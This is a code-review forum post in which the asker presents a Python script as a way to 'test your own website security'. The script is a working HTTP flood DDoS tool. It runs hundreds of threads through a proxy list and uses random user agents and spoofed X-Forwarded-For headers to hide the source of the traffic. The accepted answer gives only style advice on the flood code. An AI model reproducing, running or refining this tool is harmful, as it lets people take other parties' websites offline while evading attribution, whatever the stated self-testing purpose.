# Application to test my own website security

Tags: python

I made a simple application to test your own website security for DDoSes in Python. Any suggestion is welcome.

```
import random
import socket
import threading
import time

userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
              "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
              "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
              "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
              "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
              "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
              "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
              "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101  Firefox/28.0",
              "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
              "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
              "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
              "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
              "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
              "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
              "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
              "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
              "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
              "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
              "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
              "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
              "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
              "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
              "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
              "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
              "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
              "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
              "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
              "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
              "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",]

def randomIp():
    random.seed()
    result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
    result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
    return result

def randomIpList():
    random.seed()
    res = ""
    for ip in xrange(random.randint(2, 8)):
        res = res + randomIp() + ", "
    return res[0:len(res) - 2]

def randomUserAgent():
    return random.choice(userAgents)



class maAttack(threading.Thread):
    def run(self):
        current = x
        if current < len(listxproxy):
            proxy = listxproxy[current].split(':')
        else:

            proxy = random.choice(listxproxy).split(':')


        useragent = "User-Agent: " + randomUserAgent() + "\r\n"
        forward = "X-Forwarded-For: " + randomIpList() + "\r\n"

        httprequest = get_host + useragent + accept + forward + connection + "\r\n"


        while nload:
            time.sleep(1)

        while 1:

            try:

                a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


                a.connect((proxy[0], int(proxy[1])))


                a.send(httprequest)






                try:


                    for i in xrange(3):
                        a.send(httprequest) 
                except:


                    tts = 1


            except:



                proxy = random.choice(listxproxy).split(':')




print("Test your own website security!")

url = raw_input("Website: ")
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]


in_file = open(raw_input("Proxy list: "),"r")
proxyf = in_file.read()
in_file.close()


listxproxy = proxyf.split('\n')


thread = input("Thread(s) (800): ")

get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
accept = "Accept-Encoding: gzip, deflate\r\n"

connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n"




nload = 1


x = 0


for x in xrange(thread):
    maAttack().start()
    time.sleep(0.003)
    print "Thread " + str(x) + " started!"

print "Testing..."

nload = 0


while not nload:
    time.sleep(1)
```

Answer (score 3, accepted):

**Separate code and data**

You put the agent list inside the code, this makes the code longer than it needs to be. I suggest reading the agents' names from a file.

**Avoid `except`**

Always specify the exception, bare except is hard to debug as it swallows any error.

**Reduce vertical spacing**

So many blank lines make very little code fit in the screen at once and make it harder to get an overall view of it.

**Seeding is automatic in Python**

There is no need to call `random.seed`

**Use list comprehension**

RandomIpList may be re-written with a list comprehension and join to be both faster and more readable.

**Use with for files**

`with` automatically closes your files and is preferred over manual open / close.

**Use underscore to signal non-usage in for loops**

Here:

```
for _ in xrange(3): # <- i becomes _
       a.send(httprequest)
```

Comment: Thank you for your suggestion! Let's wait for other people! :)